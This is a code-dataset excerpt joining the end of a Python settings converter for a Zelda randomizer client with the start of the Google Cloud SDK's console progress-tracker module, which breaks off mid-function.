"1": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
"2": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
"3": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
"4": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
"5": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
"6": ["auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill", "auto_fill"],
"pull": ["auto_fill", "auto_fill", "auto_fill"],
"crab": ["auto_fill", "auto_fill"],
"stun": ["auto_fill"],
"fish": ["auto_fill"]
},
"custom": {
"item.Goal.Required": "",
"item.require.Lamp": False,
"item.value.BlueClock": "",
"item.value.GreenClock": "",
"item.value.RedClock": "",
"item.value.Rupoor": "",
"prize.crossWorld": True,
"prize.shuffleCrystals": True,
"prize.shufflePendants": True,
"region.bossNormalLocation": True,
"region.wildBigKeys": False,
"region.wildCompasses": False,
"region.wildKeys": False,
"region.wildMaps": False,
"rom.dungeonCount": "off",
"rom.freeItemMenu": False,
"rom.freeItemText": False,
"rom.mapOnPickup": False,
"rom.timerMode": "off",
"rom.timerStart": "",
"rom.rupeeBow": False,
"rom.genericKeys": False,
"spoil.BootsLocation": False,
"canBombJump": False,
"canBootsClip": False,
"canBunnyRevive": False,
"canBunnySurf": False,
"canDungeonRevive": False,
"canFakeFlipper": False,
"canMirrorClip": False,
"canMirrorWrap": False,
"canOneFrameClipOW": False,
"canOneFrameClipUW": False,
"canOWYBA": False,
"canSuperBunny": False,
"canSuperSpeed": False,
"canWaterFairyRevive": False,
"canWaterWalk": False,
"item": {
"count": {
"BottleWithRandom": 4,
"Nothing": 0,
"L1Sword": 0,
"L1SwordAndShield": 0,
"MasterSword": 0,
"L3Sword": 0,
"L4Sword": 0,
"BlueShield": 0,
"RedShield": 0,
"MirrorShield": 0,
"FireRod": 1,
"IceRod": 1,
"Hammer": 1,
"Hookshot": 1,
"Bow": 0,
"Boomerang": 1,
"Powder": 1,
"Bombos": 1,
"Ether": 1,
"Quake": 1,
"Lamp": 1,
"Shovel": 1,
"OcarinaInactive": 1,
"CaneOfSomaria": 1,
"Bottle": 0,
"PieceOfHeart": 24,
"CaneOfByrna": 1,
"Cape": 1,
"MagicMirror": 1,
"PowerGlove": 0,
"TitansMitt": 0,
"BookOfMudora": 1,
"Flippers": 1,
"MoonPearl": 1,
"BugCatchingNet": 1,
"BlueMail": 0,
"RedMail": 0,
"Bomb": 0,
"ThreeBombs": 16,
"Mushroom": 1,
"RedBoomerang": 1,
"BottleWithRedPotion": 0,
"BottleWithGreenPotion": 0,
"BottleWithBluePotion": 0,
"TenBombs": 1,
"OneRupee": 2,
"FiveRupees": 4,
"TwentyRupees": 28,
"BowAndArrows": 0,
"BowAndSilverArrows": 0,
"BottleWithBee": 0,
"BottleWithFairy": 0,
"BossHeartContainer": 10,
"HeartContainer": 1,
"OneHundredRupees": 1,
"FiftyRupees": 7,
"Heart": 0,
"Arrow": 1,
"TenArrows": 12,
"SmallMagic": 0,
"ThreeHundredRupees": 5,
"BottleWithGoldBee": 0,
"OcarinaActive": 0,
"PegasusBoots": 1,
"BombUpgrade5": 0,
"BombUpgrade10": 0,
"ArrowUpgrade5": 0,
"ArrowUpgrade10": 0,
"HalfMagic": 1,
"QuarterMagic": 0,
"SilverArrowUpgrade": 0,
"Rupoor": 0,
"RedClock": 0,
"BlueClock": 0,
"GreenClock": 0,
"ProgressiveSword": 4,
"ProgressiveShield": 3,
"ProgressiveArmor": 2,
"ProgressiveGlove": 2,
"ProgressiveBow": 2,
"Triforce": 0,
"TriforcePiece": 0,
"MapA2": 1,
"MapD7": 1,
"MapD4": 1,
"MapP3": 1,
"MapD5": 1,
"MapD3": 1,
"MapD6": 1,
"MapD1": 1,
"MapD2": 1,
"MapA1": 0,
"MapP2": 1,
"MapP1": 1,
"MapH1": 0,
"MapH2": 1,
"CompassA2": 1,
"CompassD7": 1,
"CompassD4": 1,
"CompassP3": 1,
"CompassD5": 1,
"CompassD3": 1,
"CompassD6": 1,
"CompassD1": 1,
"CompassD2": 1,
"CompassA1": 0,
"CompassP2": 1,
"CompassP1": 1,
"CompassH1": 0,
"CompassH2": 0,
"BigKeyA2": 1,
"BigKeyD7": 1,
"BigKeyD4": 1,
"BigKeyP3": 1,
"BigKeyD5": 1,
"BigKeyD3": 1,
"BigKeyD6": 1,
"BigKeyD1": 1,
"BigKeyD2": 1,
"BigKeyA1": 0,
"BigKeyP2": 1,
"BigKeyP1": 1,
"BigKeyH1": 0,
"BigKeyH2": 0,
"KeyH2": 1,
"KeyH1": 0,
"KeyP1": 0,
"KeyP2": 1,
"KeyA1": 2,
"KeyD2": 1,
"KeyD1": 6,
"KeyD6": 3,
"KeyD3": 3,
"KeyD5": 2,
"KeyP3": 1,
"KeyD4": 1,
"KeyD7": 4,
"KeyA2": 4
}
},
"drop": {
"count": {
"Bee": 0,
"BeeGood": 0,
"Heart": 13,
"RupeeGreen": 9,
"RupeeBlue": 7,
"RupeeRed": 6,
"BombRefill1": 7,
"BombRefill4": 1,
"BombRefill8": 2,
"MagicRefillSmall": 6,
"MagicRefillFull": 3,
"ArrowRefill5": 5,
"ArrowRefill10": 3,
"Fairy": 1
}
}
}
}
def convert2settings(
customizer_save,
tournament=False,
spoilers="off",
spoilers_ongen=False):
"""Converts a customizer-settings.json file from alttpr.com to a settings dictionary that can be used for generating a game.
Arguments:
customizer_save {dict} -- A dictionary of the customizer-settings.json file (needs to already be converted to a dict)
Keyword Arguments:
tournament {bool} -- Setting to True generates a race rom, which excludes the spoiler log. (default: {False})
spoilers {str} -- Sets the spoiler mode. (default: {"off"})
spoielrs_ongen {bool} -- Sets spoiler mode to "generate". This is deprecated. (default: {False})
Returns:
dict -- a dictionary of settings that can be used with pyz3r.alttpr()
"""
if spoilers_ongen:
spoilers = "generate"
# the settings defaults, hopefully this is accurate
settings = copy.deepcopy(BASE_CUSTOMIZER_PAYLOAD)
settings['tournament'] = tournament
settings['spoilers'] = spoilers
# TODO we can probably compact this down a bit
try:
if not customizer_save['randomizer.glitches_required'] is None:
settings['glitches'] = customizer_save['randomizer.glitches_required']
except KeyError:
pass
try:
if not customizer_save['randomizer.accessibility'] is None:
settings['accessibility'] = customizer_save['randomizer.accessibility']
except KeyError:
pass
try:
if not customizer_save['randomizer.goal'] is None:
settings['goal'] = customizer_save['randomizer.goal']
except KeyError:
pass
try:
if not customizer_save['randomizer.tower_open'] is None:
settings['crystals']['tower'] = customizer_save['randomizer.tower_open']
except KeyError:
pass
try:
if not customizer_save['randomizer.ganon_open'] is None:
settings['crystals']['ganon'] = customizer_save['randomizer.ganon_open']
except KeyError:
pass
try:
if not customizer_save['randomizer.dungeon_items'] is None:
settings['dungeon_items'] = customizer_save['randomizer.dungeon_items']
except KeyError:
pass
try:
if not customizer_save['randomizer.item_placement'] is None:
settings['item_placement'] = customizer_save['randomizer.item_placement']
except KeyError:
pass
try:
if not customizer_save['randomizer.world_state'] is None:
settings['mode'] = customizer_save['randomizer.world_state']
except KeyError:
pass
try:
if not customizer_save['randomizer.hints'] is None:
settings['hints'] = customizer_save['randomizer.hints']
except KeyError:
pass
try:
if not customizer_save['randomizer.weapons'] is None:
settings['weapons'] = customizer_save['randomizer.weapons']
except KeyError:
pass
try:
if not customizer_save['randomizer.item_pool'] is None:
settings['item']['pool'] = customizer_save['randomizer.item_pool']
except KeyError:
pass
try:
if not customizer_save['randomizer.item_functionality'] is None:
settings['item']['functionality'] = customizer_save['randomizer.item_functionality']
except KeyError:
pass
try:
if not customizer_save['randomizer.boss_shuffle'] is None:
settings['enemizer']['boss_shuffle'] = customizer_save['randomizer.boss_shuffle']
except KeyError:
pass
try:
if not customizer_save['randomizer.enemy_shuffle'] is None:
settings['enemizer']['enemy_shuffle'] = customizer_save['randomizer.enemy_shuffle']
except KeyError:
pass
try:
if not customizer_save['randomizer.enemy_damage'] is None:
settings['enemizer']['enemy_damage'] = customizer_save['randomizer.enemy_damage']
except KeyError:
pass
try:
if not customizer_save['randomizer.enemy_health'] is None:
settings['enemizer']['enemy_health'] = customizer_save['randomizer.enemy_health']
except KeyError:
pass
try:
if not customizer_save['randomizer.pot_shuffle'] is None:
settings['enemizer']['pot_shuffle'] = customizer_save['randomizer.pot_shuffle']
except KeyError:
pass
# vt.custom.prizepacks
try:
if not customizer_save['vt.custom.prizepacks'] is None:
settings['drops'] = customizer_save['vt.custom.prizepacks']
except KeyError:
pass
# vt.custom.drops
try:
if not customizer_save['vt.custom.drops'] is None:
settings['drop']['count'] = customizer_save['vt.custom.drops']
except KeyError:
pass
try:
if not customizer_save['vt.custom.settings'] is None:
for key, value in customizer_save['vt.custom.settings'].items(
):
settings['custom'][key] = value
except KeyError:
pass
try:
if not customizer_save['vt.custom.glitches'] is None:
for key, value in customizer_save['vt.custom.glitches'].items(
):
settings['custom'][key] = value
except KeyError:
pass
try:
if not customizer_save['vt.custom.items'] is None:
settings['custom']['item']['count'] = customizer_save['vt.custom.items']
except KeyError:
pass
try:
if not customizer_save['vt.custom.locations'] is None:
settings['l'] = customizer_save['vt.custom.locations']
except KeyError:
pass
try:
if not customizer_save['vt.custom.notes'] is None:
settings['notes'] = customizer_save['vt.custom.notes']
except KeyError:
pass
try:
if not customizer_save['vt.custom.name'] is None:
settings['name'] = customizer_save['vt.custom.name']
except KeyError:
pass
try:
if not customizer_save['vt.custom.equipment'] is None:
eq = []
for key, value in customizer_save['vt.custom.equipment'].items():
eq += get_starting_equipment(key, value)
settings['eq'] = eq
except KeyError:
pass
return settings
def get_starting_equipment(key, value):
eq = []
if key in ['Bottle1', 'Bottle2', 'Bottle3', 'Bottle4']:
if value == 1:
eq += ['Bottle']
elif value == 2:
eq += ['BottleWithRedPotion']
elif value == 3:
eq += ['BottleWithGreenPotion']
elif value == 4:
eq += ['BottleWithBluePotion']
elif value == 5:
eq += ['BottleWithBee']
elif value == 6:
eq += ['BottleWithGoldBee']
elif value == 7:
eq += ['BottleWithFairy']
elif key == 'ProgressiveBow':
if value == 1:
eq += ['SilverArrowUpgrade']
elif value == 2:
eq += ['Bow']
elif value == 3:
eq += ['BowAndSilverArrows']
elif key == 'Boomerang':
if value == 1:
eq += ['Boomerang']
elif value == 2:
eq += ['RedBoomerang']
elif value == 3:
eq += ['Boomerang', 'RedBoomerang']
elif key == 'Ocarina':
if value == 1:
eq += ['OcarinaInactive']
elif value == 2:
eq += ['OcarinaActive']
elif key == "Rupees":
value = int(value)
eq += math.floor(value / 300) * ['ThreeHundredRupees']
value %= 300
eq += math.floor(value / 100) * ['OneHundredRupees']
value %= 100
eq += math.floor(value / 50) * ['FiftyRupees']
value %= 50
eq += math.floor(value / 20) * ['TwentyRupees']
value %= 20
eq += math.floor(value / 5) * ['FiveRupees']
value %= 5
eq += math.floor(value / 1) * ['OneRupee']
else:
eq += int(value) * [key]
return eq
| [
"tcprescott@gmail.com"
] | tcprescott@gmail.com |
7753d769b8a13f8066b9d01a11ef57c4dd5cac07 | 70fa6468c768d4ec9b4b14fc94fa785da557f1b5 | /lib/googlecloudsdk/core/console/progress_tracker.py | d4ac99b25f6a93b8f2e0f9a192a04a62669bc014 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | kylewuolle/google-cloud-sdk | d43286ef646aec053ecd7eb58566ab2075e04e76 | 75f09ebe779e99fdc3fd13b48621fe12bfaa11aa | refs/heads/master | 2020-04-20T22:10:41.774132 | 2019-01-26T09:29:26 | 2019-01-26T09:29:26 | 169,131,028 | 0 | 0 | NOASSERTION | 2019-02-04T19:04:40 | 2019-02-04T18:58:36 | Python | UTF-8 | Python | false | false | 42,381 | py | # -*- coding: utf-8 -*- #
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Progress Tracker for Cloud SDK."""
# TODO(b/113319639): Temporary skip to get pytype enabled.
# pytype: skip-file
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import abc
import os
import signal
import sys
import threading
import time
import enum
from googlecloudsdk.core import log
from googlecloudsdk.core import properties
from googlecloudsdk.core.console import console_attr
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.console import multiline
import six
def ProgressTracker(
message=None, autotick=True, detail_message_callback=None, tick_delay=1,
interruptable=True,
aborted_message=console_io.OperationCancelledError.DEFAULT_MESSAGE):
"""A context manager for telling the user about long-running progress.
Args:
message: str, The message to show next to the spinner.
autotick: bool, True to have the spinner tick on its own. Otherwise, you
need to call Tick() explicitly to move the spinner.
detail_message_callback: func, A no argument function that will be called
and the result appended to message each time it needs to be printed.
tick_delay: float, The amount of time to wait between ticks, in second.
interruptable: boolean, True if the user can ctrl-c the operation. If so,
it will stop and will report as aborted. If False, a message will be
displayed saying that it cannot be cancelled.
aborted_message: str, A custom message to put in the exception when it is
cancelled by the user.
Returns:
The progress tracker.
"""
style = properties.VALUES.core.interactive_ux_style.Get()
if style == properties.VALUES.core.InteractiveUXStyles.OFF.name:
return _NoOpProgressTracker(interruptable, aborted_message)
elif style == properties.VALUES.core.InteractiveUXStyles.TESTING.name:
return _StubProgressTracker(message, interruptable, aborted_message)
else:
is_tty = console_io.IsInteractive(error=True)
tracker_cls = (_NormalProgressTracker if is_tty
else _NonInteractiveProgressTracker)
return tracker_cls(
message, autotick, detail_message_callback, tick_delay, interruptable,
aborted_message)
class _BaseProgressTracker(six.with_metaclass(abc.ABCMeta, object)):
"""A context manager for telling the user about long-running progress."""
def __init__(self, message, autotick, detail_message_callback, tick_delay,
interruptable, aborted_message):
self._stream = sys.stderr
if message is None:
self._spinner_only = True
self._message = ''
self._prefix = ''
else:
self._spinner_only = False
self._message = message
self._prefix = message + '...'
self._detail_message_callback = detail_message_callback
self._ticks = 0
self._done = False
self._lock = threading.Lock()
self._tick_delay = tick_delay
self._ticker = None
console_width = console_attr.ConsoleAttr().GetTermSize()[0]
if console_width < 0:
# This can happen if we're on a pseudo-TTY. Set it to 0 and also
# turn off output to prevent hanging.
console_width = 0
self._output_enabled = log.IsUserOutputEnabled() and console_width != 0
# Don't bother autoticking if we aren't going to print anything.
self.__autotick = autotick and self._output_enabled
self._interruptable = interruptable
self._aborted_message = aborted_message
self._old_signal_handler = None
self._symbols = console_attr.GetConsoleAttr().GetProgressTrackerSymbols()
@property
def _autotick(self):
return self.__autotick
def _GetPrefix(self):
if self._detail_message_callback:
detail_message = self._detail_message_callback()
if detail_message:
return self._prefix + ' ' + detail_message + '...'
return self._prefix
def _SetUpSignalHandler(self):
"""Sets up a signal handler for handling SIGINT."""
def _CtrlCHandler(unused_signal, unused_frame):
if self._interruptable:
raise console_io.OperationCancelledError(self._aborted_message)
else:
with self._lock:
sys.stderr.write('\n\nThis operation cannot be cancelled.\n\n')
try:
self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
self._restore_old_handler = True
except ValueError:
# Only works in the main thread. Gcloud does not run in the main thread
# in gcloud interactive.
self._restore_old_handler = False
def _TearDownSignalHandler(self):
if self._restore_old_handler:
try:
signal.signal(signal.SIGINT, self._old_signal_handler)
except ValueError:
pass # only works in main thread
def __enter__(self):
# Setup signal handlers
self._SetUpSignalHandler()
log.file_only_logger.info(self._GetPrefix())
self._Print()
if self._autotick:
def Ticker():
while True:
_SleepSecs(self._tick_delay)
if self.Tick():
return
self._ticker = threading.Thread(target=Ticker)
self._ticker.start()
return self
def __exit__(self, unused_ex_type, exc_value, unused_traceback):
with self._lock:
self._done = True
# If an exception was raised during progress tracking, exit silently here
# and let the appropriate exception handler tell the user what happened.
if exc_value:
# This is to prevent the tick character from appearing before 'failed.'
# (ex. 'message...failed' instead of 'message.../failed.')
if isinstance(exc_value, console_io.OperationCancelledError):
self._Print('aborted by ctrl-c.\n')
else:
self._Print('failed.\n')
elif not self._spinner_only:
self._Print('done.\n')
if self._ticker:
self._ticker.join()
self._TearDownSignalHandler()
@abc.abstractmethod
def Tick(self):
"""Give a visual indication to the user that some progress has been made.
Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
Returns:
Whether progress has completed.
"""
pass
@abc.abstractmethod
def _Print(self, message=''):
"""Prints an update containing message to the output stream."""
pass
class _NormalProgressTracker(_BaseProgressTracker):
"""A context manager for telling the user about long-running progress."""
def __enter__(self):
self._SetupOutput()
return super(_NormalProgressTracker, self).__enter__()
def _SetupOutput(self):
def _FormattedCallback():
if self._detail_message_callback:
detail_message = self._detail_message_callback()
if detail_message:
return ' ' + detail_message + '...'
return None
self._console_output = multiline.SimpleSuffixConsoleOutput(self._stream)
self._console_message = self._console_output.AddMessage(
self._prefix, detail_message_callback=_FormattedCallback)
def Tick(self):
"""Give a visual indication to the user that some progress has been made.
Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
Returns:
Whether progress has completed.
"""
with self._lock:
if not self._done:
self._ticks += 1
self._Print(self._symbols.spin_marks[
self._ticks % len(self._symbols.spin_marks)])
return self._done
def _Print(self, message=''):
"""Reprints the prefix followed by an optional message.
If there is a multiline message, we print the full message and every
time the Prefix Message is the same, we only reprint the last line to
account for a different 'message'. If there is a new message, we print
on a new line.
Args:
message: str, suffix of message
"""
if self._spinner_only or not self._output_enabled:
return
self._console_output.UpdateMessage(self._console_message, message)
self._console_output.UpdateConsole()
class _NonInteractiveProgressTracker(_BaseProgressTracker):
"""A context manager for telling the user about long-running progress."""
def Tick(self):
"""Give a visual indication to the user that some progress has been made.
Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
Returns:
Whether progress has completed.
"""
with self._lock:
if not self._done:
self._Print('.')
return self._done
def _Print(self, message=''):
"""Reprints the prefix followed by an optional message.
If there is a multiline message, we print the full message and every
time the Prefix Message is the same, we only reprint the last line to
account for a different 'message'. If there is a new message, we print
on a new line.
Args:
message: str, suffix of message
"""
if self._spinner_only or not self._output_enabled:
return
# Since we are not in a tty, print will be called twice outside of normal
# ticking. The first time during __enter__, where the tracker message should
# be outputted. The second time is during __exit__, where a status updated
# contained in message will be outputted.
display_message = self._GetPrefix()
self._stream.write(message or display_message + '\n')
return
class _NoOpProgressTracker(object):
"""A Progress tracker that doesn't do anything."""
def __init__(self, interruptable, aborted_message):
self._interruptable = interruptable
self._aborted_message = aborted_message
self._done = False
def __enter__(self):
def _CtrlCHandler(unused_signal, unused_frame):
if self._interruptable:
raise console_io.OperationCancelledError(self._aborted_message)
self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
return self
def Tick(self):
return self._done
def __exit__(self, exc_type, exc_val, exc_tb):
self._done = True
signal.signal(signal.SIGINT, self._old_signal_handler)
class _StubProgressTracker(_NoOpProgressTracker):
"""A Progress tracker that only prints deterministic start and end points.
No UX about tracking should be exposed here. This is strictly for being able
to tell that the tracker ran, not what it actually looks like.
"""
def __init__(self, message, interruptable, aborted_message):
super(_StubProgressTracker, self).__init__(interruptable, aborted_message)
self._message = message or ''
self._stream = sys.stderr
def __exit__(self, exc_type, exc_val, exc_tb):
if not exc_val:
status = 'SUCCESS'
elif isinstance(exc_val, console_io.OperationCancelledError):
status = 'INTERRUPTED'
else:
status = 'FAILURE'
if log.IsUserOutputEnabled():
self._stream.write(console_io.JsonUXStub(
console_io.UXElementType.PROGRESS_TRACKER,
message=self._message, status=status) + '\n')
return super(_StubProgressTracker, self).__exit__(exc_type, exc_val, exc_tb)
def _SleepSecs(seconds):
"""Sleep int or float seconds. For mocking sleeps in this module."""
time.sleep(seconds)
def CompletionProgressTracker(ofile=None, timeout=4.0, tick_delay=0.1,
background_ttl=60.0, autotick=True):
"""A context manager for visual feedback during long-running completions.
A completion that exceeds the timeout is assumed to be refreshing the cache.
At that point the progress tracker displays '?', forks the cache operation
into the background, and exits. This gives the background cache update a
chance finish. After background_ttl more seconds the update is forcibly
exited (forced to call exit rather than killed by signal) to prevent hung
updates from proliferating in the background.
Args:
ofile: The stream to write to.
timeout: float, The amount of time in second to show the tracker before
backgrounding it.
tick_delay: float, The time in second between ticks of the spinner.
background_ttl: float, The number of seconds to allow the completion to
run in the background before killing it.
autotick: bool, True to tick the spinner automatically.
Returns:
The completion progress tracker.
"""
style = properties.VALUES.core.interactive_ux_style.Get()
if (style == properties.VALUES.core.InteractiveUXStyles.OFF.name or
style == properties.VALUES.core.InteractiveUXStyles.TESTING.name):
return _NoOpCompletionProgressTracker()
else:
return _NormalCompletionProgressTracker(
ofile, timeout, tick_delay, background_ttl, autotick)
class _NormalCompletionProgressTracker(object):
"""A context manager for visual feedback during long-running completions.
A completion that exceeds the timeout is assumed to be refreshing the cache.
At that point the progress tracker displays '?', forks the cache operation
into the background, and exits. This gives the background cache update a
chance finish. After background_ttl more seconds the update is forcibly
exited (forced to call exit rather than killed by signal) to prevent hung
updates from proliferating in the background.
"""
_COMPLETION_FD = 9
def __init__(self, ofile, timeout, tick_delay, background_ttl, autotick):
self._ofile = ofile or self._GetStream()
self._timeout = timeout
self._tick_delay = tick_delay
self.__autotick = autotick
self._background_ttl = background_ttl
self._ticks = 0
self._symbols = console_attr.GetConsoleAttr().GetProgressTrackerSymbols()
def __enter__(self):
if self._autotick:
self._old_handler = signal.signal(signal.SIGVTALRM, self._Spin)
self._old_itimer = signal.setitimer(
signal.ITIMER_VIRTUAL, self._tick_delay, self._tick_delay)
return self
def __exit__(self, unused_type=None, unused_value=True,
unused_traceback=None):
if self._autotick:
signal.setitimer(signal.ITIMER_VIRTUAL, *self._old_itimer)
signal.signal(signal.SIGVTALRM, self._old_handler)
if not self._TimedOut():
self._WriteMark(' ')
def _TimedOut(self):
"""True if the tracker has timed out."""
return self._timeout < 0
def _Spin(self, unused_sig=None, unused_frame=None):
"""Rotates the spinner one tick and checks for timeout."""
self._ticks += 1
self._WriteMark(self._symbols.spin_marks[
self._ticks % len(self._symbols.spin_marks)])
self._timeout -= self._tick_delay
if not self._TimedOut():
return
# Timed out.
self._WriteMark('?')
# Exit the parent process.
if os.fork():
os._exit(1) # pylint: disable=protected-access
# Allow the child to run in the background for up to self._background_ttl
# more seconds before being forcefully exited.
signal.signal(signal.SIGVTALRM, self._ExitBackground) # pytype: disable=wrong-arg-types
signal.setitimer(
signal.ITIMER_VIRTUAL, self._background_ttl, self._background_ttl)
# Suppress the explicit completion status channel. stdout and stderr have
# already been suppressed.
self._ofile = None
def _WriteMark(self, mark):
"""Writes one mark to self._ofile."""
if self._ofile:
self._ofile.write(mark + '\b')
self._ofile.flush()
@staticmethod
def _ExitBackground():
"""Unconditionally exits the background completer process after timeout."""
os._exit(1) # pylint: disable=protected-access
@property
def _autotick(self):
return self.__autotick
@staticmethod
def _GetStream():
"""Returns the completer output stream."""
return os.fdopen(
os.dup(_NormalCompletionProgressTracker._COMPLETION_FD), 'w')
class _NoOpCompletionProgressTracker(object):
"""A Progress tracker that prints nothing."""
def __init__(self):
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def StagedProgressTracker(
message, stages, tracker_id=None, autotick=True, tick_delay=0.1,
interruptable=True, done_message_callback=None, success_message=None,
failure_message=None,
aborted_message=console_io.OperationCancelledError.DEFAULT_MESSAGE):
"""A progress tracker for performing actions with multiple stages.
The progress tracker is a context manager. To start displaying information
about a running stage, call StartStage within the staged progress tracker
context. To update the message of a stage, use UpdateStage. When a stage is
completed/failed there are CompleteStage and FailStage methods on the
tracker as well.
Note that stages do not need to be started/completed in order. In
non-multiline (the only supported mode) output mode, the displayed stage will
be the earliest started stage that has not been completed.
Example Usage:
get_bread = Stage('Getting bread...')
get_pb_and_j = Stage('Getting peanut butter...')
make_sandwich = Stage('Making sandwich...')
stages = [get_bread, get_pb_and_j, make_sandwich]
with StagedProgressTracker(
'Making sandwich...',
stages,
success_message='Time to eat!',
failure_message='Time to order delivery..!',
tracker_id='meta.make_sandwich') as tracker:
tracker.StartStage(get_bread)
# Go to pantry
tracker.UpdateStage(get_bread, 'Looking for bread in the pantry')
# Get bread
tracker.CompleteStage('Got some whole wheat bread!')
tracker.StartStage(get_pb_and_j)
# Look for peanut butter
if pb_not_found:
error = exceptions.NoPeanutButterError('So sad!')
tracker.FailStage(get_pb_and_j, error)
Args:
message: str, The message to show next to the spinner.
stages: list[Stage], A list of stages for the progress tracker to run.
tracker_id: str The ID of this tracker that will be used for metrics.
autotick: bool, True to have the spinner tick on its own. Otherwise, you
need to call Tick() explicitly to move the spinner.
tick_delay: float, The amount of time to wait between ticks, in second.
interruptable: boolean, True if the user can ctrl-c the operation. If so,
it will stop and will report as aborted. If False,
done_message_callback: func, A callback to get a more detailed done message.
success_message: str, A message to display on success of all tasks.
failure_message: str, A message to display on failure of a task.
aborted_message: str, A custom message to put in the exception when it is
cancelled by the user.
Returns:
The progress tracker.
"""
style = properties.VALUES.core.interactive_ux_style.Get()
if style == properties.VALUES.core.InteractiveUXStyles.OFF.name:
return _NoOpStagedProgressTracker(stages, interruptable, aborted_message)
elif style == properties.VALUES.core.InteractiveUXStyles.TESTING.name:
return _StubStagedProgressTracker(
message, stages, interruptable, aborted_message)
else:
is_tty = console_io.IsInteractive(error=True)
if is_tty:
if console_attr.ConsoleAttr().SupportsAnsi():
tracker_cls = _MultilineStagedProgressTracker
else:
tracker_cls = _NormalStagedProgressTracker
else:
tracker_cls = _NonInteractiveStagedProgressTracker
return tracker_cls(
message, stages, success_message, failure_message, autotick,
tick_delay, interruptable, aborted_message, tracker_id,
done_message_callback)
class Stage(object):
"""Defines a stage of a staged progress tracker."""
def __init__(self, header, task_id=None):
"""Encapsulates a stage in a staged progress tracker.
A task should contain a message about what it does and define a function
that performs said task.
Args:
header: (str) The header that describes what the task is doing.
A high level description like 'Uploading files' would be appropriate.
task_id: (str) The ID of this task that will be used for metrics.
timing metrics. NOTE: Metrics are currently not implemented yet.
"""
self._header = header
self.message = ''
self.task_id = task_id
# TODO(b/109928970): Add support for progress bars.
# TODO(b/109928025): Add support for timing metrics by task id.
# Task attributes
self._is_done = False
self.status = StageCompletionStatus.NOT_STARTED
@property
def header(self):
return self._header
@property
def is_done(self):
return self._is_done
class StageCompletionStatus(enum.Enum):
"""Indicates the completion status of a stage."""
NOT_STARTED = 'not started'
RUNNING = 'still running'
SUCCESS = 'done'
FAILED = 'failed'
INTERRUPTED = 'interrupted'
class _StagedProgressTrackerInterface(six.with_metaclass(abc.ABCMeta, object)):
"""Interface for staged progress trackers."""
def __init__(self, stages):
self._stages = stages
@abc.abstractmethod
def __enter__(self):
pass
@abc.abstractmethod
def __exit__(self, unused_ex_type, exc_value, unused_traceback):
pass
@abc.abstractmethod
def Tick(self):
"""Give a visual indication to the user that some progress has been made.
Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
Returns:
Whether progress has completed.
"""
pass
@abc.abstractmethod
def _Print(self, message=''):
"""Prints an update containing message to the output stream."""
pass
def UpdateHeaderMessage(self, message):
"""Updates the header messsage if supported."""
pass
@abc.abstractmethod
def StartStage(self, stage):
"""Informs the progress tracker that this stage has started."""
pass
@abc.abstractmethod
def UpdateStage(self, stage, message):
"""Updates a stage in the progress tracker."""
pass
@abc.abstractmethod
def CompleteStage(self, stage, message=None):
"""Informs the progress tracker that this stage has completed."""
pass
@abc.abstractmethod
def FailStage(self, stage, exception):
"""Informs the progress tracker that this stage has failed."""
pass
class _BaseStagedProgressTracker(
six.with_metaclass(abc.ABCMeta, _StagedProgressTrackerInterface)):
"""Base class for staged progress trackers.
During each tick, the tracker checks if there is a stage being displayed by
checking if _stage_being_displayed is not None. If it is not none and stage
has not completed, then the tracker will print an update. If the stage is
done, then the tracker will write out the status of all completed stages
in _running_stages_queue.
"""
def __init__(self, message, stages, success_message, failure_message,
autotick, tick_delay, interruptable, aborted_message,
tracker_id, done_message_callback):
super(_BaseStagedProgressTracker, self).__init__(stages)
self._stream = sys.stderr
# TODO(b/111637901): Support detailed message callback when true multiline
# support is available.
self._message = message
self._success_message = success_message
self._failure_message = failure_message
self._aborted_message = aborted_message
self._done_message_callback = done_message_callback
self._tracker_id = tracker_id
console_width = console_attr.ConsoleAttr().GetTermSize()[0]
if console_width < 0:
# This can happen if we're on a pseudo-TTY. Set it to 0 and also
# turn off output to prevent hanging.
console_width = 0
self._output_enabled = log.IsUserOutputEnabled() and console_width != 0
# Don't bother autoticking if we aren't going to print anything.
self.__autotick = autotick and self._output_enabled
self._interruptable = interruptable
self._tick_delay = tick_delay
self._symbols = console_attr.GetConsoleAttr().GetProgressTrackerSymbols()
self._done = False
self._exception_is_uncaught = True
self._ticks = 0
self._ticker = None
self._running_stages = set()
self._completed_stages = []
self._lock = threading.Lock()
@property
def _autotick(self):
return self.__autotick
def _SetUpSignalHandler(self):
"""Sets up a signal handler for handling SIGINT."""
def _CtrlCHandler(unused_signal, unused_frame):
if self._interruptable:
raise console_io.OperationCancelledError(self._aborted_message)
else:
self._NotifyUninterruptableError()
try:
self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
self._restore_old_handler = True
except ValueError:
# Only works in the main thread. Gcloud does not run in the main thread
# in gcloud interactive.
self._restore_old_handler = False
def _NotifyUninterruptableError(self):
with self._lock:
